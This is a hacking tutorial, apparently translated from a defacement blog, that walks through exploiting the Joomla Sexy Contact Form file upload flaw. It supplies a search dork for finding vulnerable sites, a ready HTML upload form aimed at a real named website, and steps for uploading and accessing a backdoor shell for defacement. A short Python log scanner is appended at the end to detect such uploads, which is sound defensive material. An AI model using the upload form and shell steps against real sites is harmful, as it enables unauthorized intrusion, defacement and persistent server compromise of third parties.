Joomla Sexy Contact Form CSRF File Upload Vulnerability






Hello everyone ^w^

This time I will cover a tutorial on how to deface with the Joomla Sexy Contact Form CSRF File Upload Vulnerability exploit ^_^

Oh, by the way, this technique is popular right now :D
A lot of defacements these days use this technique :D
Hehe, okay, let's get straight to it :D

What you need:

1. A Cross Site Request Forgery (CSRF) script:

<form method="POST" action="http://www.Frieskavers.co.Li/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>


Copy and paste the script above into Notepad and save it as .html
*Replace the part shown in red with your target* ^_^

2. A backdoor shell, of course ^_^

Okay, here is how it is done:

First, find a target with the following dork ^_^

inurl:/com_sexycontactform/  ~ com_sexycontactform/ site:gr 

The dork can be developed further ^_^

Now the exploit:

components/com_sexycontactform/fileupload/index.php

Vulnerability Check :


After that, copy the target link into the CSRF script you made earlier ^_^

Here is my example target:

http://cookmeup.gr/components/com_sexycontactform/fileupload/index.php

In the CSRF script it ends up like this:

<form method="POST" action="http://cookmeup.gr/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

Got it, right? :D

If you don't get it, look at this picture:


When that is done, open the CSRF script in your browser ^_^
Then upload your shell :D


If it succeeds, the name of your shell will appear like this :D


Now, the shell access is here ^_^

Target.co.Li/components/com_sexycontactform/fileupload/files/YourShell.php

It ends up like this :D

http://cookmeup.gr/components/com_sexycontactform/fileupload/files/frieskavers.php


After that, it's up to you what you do with it, hehehe :v /

Well, that's it. Hope it's useful ^_^
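
Seen from the server side, the two requests described above (a POST to components/com_sexycontactform/fileupload/index.php, then a request for a .php file under fileupload/files/) both show up in the web access log. The following is an added example, not part of the original post, that flags them in combined-format log lines; the extension list, log lines, IP addresses and file names are constructed assumptions.

```python
import re
from urllib.parse import unquote

# The two paths come from the post; everything else is an assumption.
UPLOAD_PATH = "/components/com_sexycontactform/fileupload/index.php"
FILES_DIR = "/components/com_sexycontactform/fileupload/files/"
# Extensions a PHP-enabled server may execute (assumed; match your handler config).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# Apache/nginx "combined" access log format.
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                  r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')

def normalise(target):
    """Drop the query string, URL-decode, and collapse repeated slashes."""
    return re.sub(r"/+", "/", unquote(target.split("?", 1)[0]))

def scan(lines):
    """Return (kind, ip, path, status) for every request that needs triage."""
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        path, status = normalise(m["target"]), int(m["status"])
        if m["method"] == "POST" and path == UPLOAD_PATH:
            findings.append(("upload", m["ip"], path, status))
        elif path.startswith(FILES_DIR) and SCRIPT_EXT.search(path):
            findings.append(("script_in_upload_dir", m["ip"], path, status))
    return findings

def upload_then_fetch(findings):
    """(ip, path) pairs where an IP posted to the handler, then got a 200 for a script."""
    uploaders, hits = set(), []
    for kind, ip, path, status in findings:
        if kind == "upload" and 200 <= status < 300:
            uploaders.add(ip)
        elif kind == "script_in_upload_dir" and status == 200 and ip in uploaders:
            hits.append((ip, path))
    return hits

# Constructed sample log lines (documentation IP ranges, made-up file names).
SAMPLE = [
    '198.51.100.7 - - [12/Oct/2014:10:01:02 +0000] "POST /components/com_sexycontactform/fileupload/index.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Oct/2014:10:01:40 +0000] "GET /components/com_sexycontactform/fileupload/files/sample.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [12/Oct/2014:10:02:00 +0000] "GET /components/com_sexycontactform/fileupload/files/cv.pdf HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [12/Oct/2014:10:03:00 +0000] "GET /components/com_sexycontactform//fileupload/files/x.PhP?a=1 HTTP/1.1" 404 0 "-" "curl/7"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
    print("upload followed by script fetch:", upload_then_fetch(scan(SAMPLE)))
```

A result from upload_then_fetch is worth treating as a possible compromise; listing the files/ directory on disk for script files is the direct confirmation.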




